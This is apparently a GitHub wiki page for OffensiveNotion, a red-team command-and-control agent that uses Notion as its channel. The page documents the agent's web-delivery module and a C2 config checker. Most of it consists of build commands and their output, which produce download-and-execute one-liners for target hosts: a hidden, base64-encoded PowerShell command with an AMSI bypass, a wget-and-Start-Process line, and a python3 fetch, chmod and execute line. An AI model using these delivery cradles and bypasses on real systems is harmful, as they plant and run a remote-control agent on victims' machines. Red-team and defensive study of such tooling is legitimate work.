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HuskyHacks edited this page Mar 22, 2022 · 2 revisions

Other information about OffensiveNotion that you may find useful. Capabilities, in addition to building the agent and setting its source configs, has a few other tricks up its sleeve.

🟠 Important

Remember that the arguments for are the same whether you're using the script as a stand alone or as part of the Docker workflow. The usage statements below show it in use as a standalone script on the physical host. But the args are the same either way.

Web Delivery

Inspired by Metasploit Framework's web_delivery module, OffensiveNotion has a lightweight web delivery module of its own. You can start it by using the script when building your agent. Once the agent has finished compiling, it is served out using a simple Flask server and provides a convenient one-liner for download and execution on the target based on your provided parameters.


Web delivery uses the following parameters which can be seen in the help message for


  -w, --webdelivery     Start a web delivery server to host and deliver your
                        agent. Provides convenient one liners to run on the
  -m {powershell,wget-linux,wget-psh,python-linux,python-windows}, --method {powershell,wget-linux,wget-psh,python-linux,python-windows}
                        Method of web delivery
  -ip HOSTIP, --hostIP HOSTIP
                        Web server host IP.
  -p PORT, --port PORT  Web server host port.

Methods for Delivery

  • powershell: Creates a base64 encoded PowerShell one-liner that includes an AMSI bypass. Also prompts to input a custom AMSI bypass if you have one on hand.
  • wget-linux: Creates a simple bash one-liner to download and execute the agent via wget.
  • wget-psh: Creates a one-liner that uses the PowerShell wget cmdlet, which is a short-hand version of Invoke-WebRequest. This method does not include an AMSI bypass.
  • python-linux: Creates a python3 one-liner to download and exec() the agent.
  • python-windows: Creates a python3 one-liner to download and exec() the agent.


Use the powershell method to build and serve a Windows agent on port 8080. Note that it prompts you to input your favorite AMSI bypass:

husky@ubuntu:~/Desktop/OffensiveNotion$ sudo python3 -o windows -b release -w -m powershell -ip -p 8080
[*] Checking Docker...
[+] Docker is installed!
[*] Copying agent
[*] Generating payload
[!] Enter your favorite AMSI bypass. Leave blank for a default > [...enter or leave blank...]

[!] Run this on the target host:
[*] powershell.exe -nop -w hidden -ep bypass -e JABRAGYAbAB0AEcATQBmAGkAPQAkAG4AdQBsAGwAOwAkAGcAdAB......

 * Running on (Press CTRL+C to quit)

Use the psh-wget method to build and serve an agent on port 80:

husky@ubuntu:~/Desktop/OffensiveNotion$ sudo python3 -b release -o windows -w -m wget-psh -ip -p 80
[*] Checking Docker...
[+] Docker is installed!
[*] Generating payload
[!] Run this on the target host:
[*] wget -usebasicparsing -o 3mC94ScA;  Start-Process -FilePath .\3mC94ScA -Wait -NoNewWindow

 * Running on (Press CTRL+C to quit)

Use the python-linux method to build and serve a Linux agent on port 80:

husky@ubuntu:~/Desktop/OffensiveNotion$ sudo python3 -b release -o linux -w -m python-linux -ip -p 80
[*] Checking Docker...
[+] Docker is installed!
[*] Generating payload
[!] Run this on the target host:
[*] python3 -c 'import urllib.request; import os; import stat; url = ""; filename = "/tmp/ATzP9bkP"; urllib.request.urlretrieve(url, filename); st = os.stat(filename); os.chmod(filename, st.st_mode | stat.S_IEXEC);os.system(filename)'

 * Running on (Press CTRL+C to quit)

C2 Linter

Ok, it's not really a linter like the one in Cobalt Strike, but it will help you troubleshoot if your agent isn't working.

Runs a check to ensure the API key and Parent Page ID can check in successfully.


This is invoked from with the following flag:

  -c, --c2lint          C2 linter. Checks your C2 config by creating a test page on your Listener.


husky@ubuntu:~/Desktop/OffensiveNotion$ sudo python3 -b release -o windows --c2lint -w -m powershell -ip -p 8080
[*] Checking Docker...
[+] Docker is installed!
[*] Checking config file...
[+] Config file located!
[*] Your configs are: 
    [*] SLEEP: 5
    [*] JITTER: 0
    [*] PARENT_PAGE_ID: [...]
    [*] LOG_LEVEL: 0
[*] Checking your C2 configs...
[*] POSTing to the Notion API...
[*] Status code: 200
[+] C2 check passed! Check your Notion notebook for a C2_LINT_TEST page.
